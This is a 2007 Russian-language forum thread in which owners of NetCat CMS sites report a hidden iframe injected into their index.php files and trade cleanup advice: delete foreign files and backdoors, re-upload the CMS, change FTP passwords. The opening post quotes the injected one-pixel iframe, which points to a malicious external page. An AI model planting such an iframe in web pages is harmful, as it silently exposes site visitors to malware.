|
|
22.04.2007, 23:39
|
|
Гость
Гость
|
Добрый день.
Обнаружил на сайте версии 2.4 внедрение следующего кода во все index.php в разных папках.
Код:<iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>
Как с эти бороться? В чем уязвимость?
|
|
|
23.04.2007, 14:19
|
|
h/z
Зарегистрирован:
2007-02-06
Сообщений: 755
|
чаще всего еще и добавляется php файлик (c функцией "backdoor") с помощью которого злоумышленник может снова получить доступ к файлам на вашем сайте
1) необходимо найти и удалить все посторонние файлы и записи в файлах
2) перезалейте файлы НетКета (возможно обновления отвалятся)
3) поменяйте пароли на фтп и почту
|
|
|
25.04.2007, 23:10
|
|
Гость
Гость
|
[cenzored] отрву [cenzored] не ходите на этот сайт там вирусы [cenzored]
|
|
|
26.04.2007, 12:35
|
|
h/z
Зарегистрирован:
2007-02-06
Сообщений: 755
|
разумеется там вирусы, потому что эта ссылка открывается в невидимом ифрейме на взломанных сайтах, чтобы заражать посетителей.
владелец сайта лишь жертва взлома.
|
|
|
26.04.2007, 16:25
|
|
ktotoff
АльтерЛан
Зарегистрирован:
2006-12-19
Сообщений: 339
|
У меня тоже такая хрень стряслась.
Не забудьте свой комп промониторить на предмет троянов.
Ну и тематический топик:
http://www.securitylab.ru/forum/read.php?FID=16&TID=38876
...жизнь прекрасна, когда правильно подобраны антидепрессанты...
|
|
|
29.05.2007, 15:31
|
|
DiGGy
DiGGy
Зарегистрирован:
2005-04-04
Сообщений: 1546
|
хех, принимайте пополнение в свои ряды! :'(
Temet nosce...
|
|
|
20.06.2007, 12:51
|
|
Гость
Гость
|
Ну что ж Вы товарищи позаражались нафик и прое....ли паролики к ftp. Вот вам и вирусняк.
|
|
|
06.07.2007, 19:18
|
|
Гость
Гость
|
Как с эти бороться? - перезалить неткат (удалить код или заменить файлы цмс)
В чем уязвимость? - попытка загрузки вируса со стороннего ресурса. кто-то получил доступ по фтп (обычно такое происходит на valuehost). По своему опыту - файл index.php не является выводимым файлом, этот файл сам формирует выводимые страницы сайта по технологии неткат, то есть этот код не будет работать как планировали злоумышленники. В худшем случае, из-за нарушения процедур программы вывода страниц, сайт "упадет".
|
|
|
09.07.2007, 13:57
|
|
DavydovFV
Зарегистрирован:
2007-07-09
Сообщений: 1
|
да валю-хвостатый отличился этим в свое время... >(
пво мво дмб II/01 202-ая зрбр
|
|
|
12.07.2007, 16:34
|
|
MihaKot
Аксарин Константин
Зарегистрирован:
2005-01-22
Сообщений: 38
|
еще этим страдает infobox
у одного из моих клиентов за неделю три раза такое было.
|
|
|
20.07.2007, 02:19
|
|
Nemo
НПЦ Владис
Зарегистрирован:
2005-02-17
Сообщений: 48
|
зашел с КПК, поменял на фтп пароль... через двое суток сайт сломан...
на сайте только стандартные шаблоны, что давались ничего от себя...
Сломан уже не один и даже не пять сайтов...
Хостеры: Sweb, PeterHost, MasterHost - очевидно проблема в самой CMS, что могут сказать разработчики?
и вопрос два, когда будет версия с годовой поддержкой, и будут такие вот дыры находится раз в год... то чтобы залатать придеться платить поддержку?
Антон
|
